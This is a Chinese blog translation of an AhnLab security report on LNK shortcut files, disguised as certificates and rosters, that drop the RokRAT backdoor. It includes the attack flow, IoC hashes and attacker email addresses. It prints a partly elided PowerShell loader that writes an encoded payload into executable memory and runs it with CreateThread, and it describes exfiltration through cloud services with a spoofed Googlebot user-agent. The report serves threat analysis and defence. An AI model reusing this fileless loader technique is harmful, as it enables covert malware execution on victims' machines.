[译文] 恶意代码分析：2.LNK文件伪装成证书传播RokRAT恶意软件（含无文件攻击）

这是作者新开的一个专栏，主要翻译国外知名安全厂商的技术报告和安全技术，了解它们的前沿技术，学习它们威胁溯源和恶意代码分析的方法，希望对您有所帮助。当然，由于作者英语有限，会借助LLM进行校验和润色，最终结合自己的安全经验完成，还请包涵！

前文介绍了文本编辑器notepad++如何被感染的，通过恶意链接引导用户下载恶意的编辑器，并分析其恶意行为。这篇文章将翻译一篇LNK文件发起的恶意攻击，主要是LNK文件伪装成证书执行RokRAT恶意软件，并利用Powershell命令发起无文件攻击和执行相关行为。基础性技术文章，希望您喜欢！

欢迎关注作者新建的『网络攻防和AI安全之家』知识星球

文章目录

一.前言
二.攻击机理分析
三.恶意软件行为分析及IOCs
四.总结

在这里插入图片描述

原文标题：《LNK File Disguised as Certificate Distributing RokRAT Malware》
原文链接：https://asec.ahnlab.com/en/65076/
文章作者：yeeun [ASEC]
发布时间：2024年5月7日
文章来源：https://asec.ahnlab.com/

前文系列：

[译文] LLM安全：1.黑客如何读取您与ChatGPT或微软Copilot的聊天内容
[译文] 恶意代码分析：1.您记事本中的内容是什么？受感染的文本编辑器notepad++
[译文] 恶意代码分析：2.LNK文件伪装成证书传播RokRAT恶意软件（含无文件攻击）

声明：本人坚决反对利用工具或渗透技术进行犯罪的行为，一切犯罪行为必将受到严惩，绿色网络需要我们共同维护，更推荐大家了解它们背后的原理，更好地进行防护。该系列主要翻译外文博客为主，旨在为大家提供他们的攻防视角。

一.前言

AhnLab安全情报中心（ASEC，AhnLab SEcurity intelligence Center） 已经确认了持续分发异常大小的快捷方式文件（.LNK），这些文件正在传播具有后门的恶意软件。他们发现该种基于快捷方式文件（.LNK）的恶意软件主要针对韩国用户，特别是与朝鲜相关的用户。

已确认的LNK文件名如下：

National Information Academy 8th Integrated Course Certificate (Final).lnk
国家信息学院第八届综合课程证书（最终）.lnk
Gate access roster 2024.lnk
2024年门禁准入名单.lnk
Northeast Project (US Congressional Research Service (CRS Report).lnk
东北项目（美国国会研究服务 CRS报告）.lnk
Facility list.lnk
设施列表.lnk

下图展示已确认的LNK文件属性。

在这里插入图片描述

二.攻击机理分析

已确认的LNK文件包含一个通过CMD执行的PowerShell命令，并且它们的类型类似于去年发布的文章中发现的类型。

RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)
通过LNK文件（*.lnk）传播的RokRAT恶意软件：RedEyes (ScarCruft)

这种类型的恶意软件有一个显著特点：它在LNK文件中包含了合法的文档文件、脚本代码和恶意PE数据。

legitimate document files
script code
malicious PE data

下图展示了LNK文件中包含的PDF文件和脚本代码。

在这里插入图片描述

RokRAT恶意软件的简化操作过程如下所示，是一种比较常见的LNK攻击：

通过Email发起鱼叉式钓鱼攻击，包括恶意LNK文件（可执行Powershell）
整个LNK文件包含：正常PDF文件、viwer.dat、search.dat、find.bat
发起RokRAT无文件攻击，利用云端API收集用户信息

更详细的描述如下：

在这里插入图片描述

（1）当LNK文件被执行时，它会运行PowerShell命令来创建并执行一个合法的文档文件。 如下图所示，创建了一个韩文的合法文档，旨在干扰被攻击者。

在这里插入图片描述

（2）随后，它在%public%文件夹中创建了3个文件。 此步骤中所创建文件的名称和特性如下：

文件名	LNK文件中的位置	特征
viewer.dat	0x2BC97 (size:0xD9402)	Encoded RokRAT malware（编码RokRAT恶意软件）
search.dat	0x105099 (size:0x5AA)	Executes viewer.dat file（执行viewer.dat文件）
find.bat	0x105643 (size:0x139)	Executes search.dat file（执行search.dat文件）

（3）第一个执行项是“find.bat”，它通过PowerShell代码运行“search.dat”。接着，“search.dat”以无文件攻击的方式读取并执行“viewer.dat”文件。

关键代码如下所示：

$exePath=$env:public+'\'+'viewer.dat';
$exeFile = Get-Content -path $exePath -encoding byte;
[Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072);
$k1123 = [System.Text.Encoding]::UTF8.GetString(34) + 'kernel32.dll' + [System.Text.Encoding]::UTF8.GetString(34);
<중략>
$byteCount = $exeFile.Length;
$buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100);
$old = 0;
$a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old);
for($i = 0;$i -lt $byteCount;$i++) { 
	[System.Runtime.InteropServices.Marshal]::WriteByte($buffer, $i, $exeFile[$i]);	};
$handle = $cake3sd23::CreateThread(0, 0, $buffer, 0, 0, 0);
$fried3sd23::WaitForSingleObject($handle, 500 * 1000);

（4）最终执行的“viewer.dat”数据即是RokRAT恶意软件，它是一种后门类型的恶意软件，能够利用云API收集用户信息，并根据威胁攻击者的命令下执行各种恶意行为。

收集到的信息通过如pCloud、Yandex和DropBox等云服务传输到威胁攻击者的云服务器中。此时，请求头中的UserAgent伪装成Googlebot，所使用的云URL如下表所示。
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

在这里插入图片描述

三.恶意软件行为分析及IOCs

该恶意软件根据威胁行为体（behaviors）或攻击者的命令可以执行的恶意行为包括：

执行cmd命令
收集目录信息
删除启动项文件夹中的特定文件（包括VBS、CMD、BAT和LNK扩展名）
收集启动文件夹列表、%APPDATA%文件夹列表以及最近使用的文件列表
收集PC信息（系统信息、IP、路由器信息等）

此外，还可以执行其他的恶意行为，并且收集到的信息在上传至攻击者的云服务器之前，会先存储在%TEMP%文件夹中。在分析过程中所识别出的攻击者的电子邮件地址如下。

tanessha.samuel@gmail[.]com
tianling0315@gmail[.]com
w.sarah0808@gmail[.]com
softpower21cs@gmail[.]com

由于此类事件频繁发生，ASEC将通过其官方博客持续分享有关恶意快捷方式文件传播的信息。特别需要注意，近年来不断发现“针对朝鲜半岛统一、军事和教育相关的个人或团体恶意软件”，因此，我们需要格外谨慎。

[File Detection]

Dropper/LNK.S2343 (2024.04.12.03)
Trojan/BAT.Runner (2024.04.12.00)
Trojan/Script.Generic (2024.04.12.00)
Data/BIN.EncPe (2024.04.12.00)
Infostealer/Win.Agent.R579429 (2023.05.05.01)

[IoC]

b85a6b1eb7418aa5da108bc0df824fc0
358122718ba11b3e8bb56340dbe94f51
35441efd293d9c9fb4788a3f0b4f2e6b
68386fa9933b2dc5711dffcee0748115
bd07b927bb765ccfc94fadbc912b0226
6e5e5ec38454ecf94e723897a42450ea
3114a3d092e269128f72cfd34812ddc8
bd98fe95107ed54df3c809d7925f2d2c

四.总结

写到这里，这篇文章就介绍完毕，基础性文章，希望对您有所帮助。

在这里插入图片描述

2024年4月28日是Eastmount的安全星球——『网络攻防和AI安全之家』正式创建和运营的日子，该星球目前主营业务为安全零基础答疑、安全技术分享、AI安全技术分享、AI安全论文交流、威胁情报每日推送、网络攻防技术总结、系统安全技术实战、面试求职、安全考研考博、简历修改及润色、学术交流及答疑、人脉触达、认知提升等。下面是星球的新人券，欢迎新老博友和朋友加入，一起分享更多安全知识，比较良心的星球，非常适合初学者和换安全专业的读者学习。

目前收到了很多博友、朋友和老师的支持和点赞，尤其是一些看了我文章多年的老粉，购买来感谢，真的很感动，类目。未来，我将分享更多高质量文章，更多安全干货，真心帮助到大家。虽然起步晚，但贵在坚持，像十多年如一日的博客分享那样，脚踏实地，只争朝夕。继续加油，再次感谢！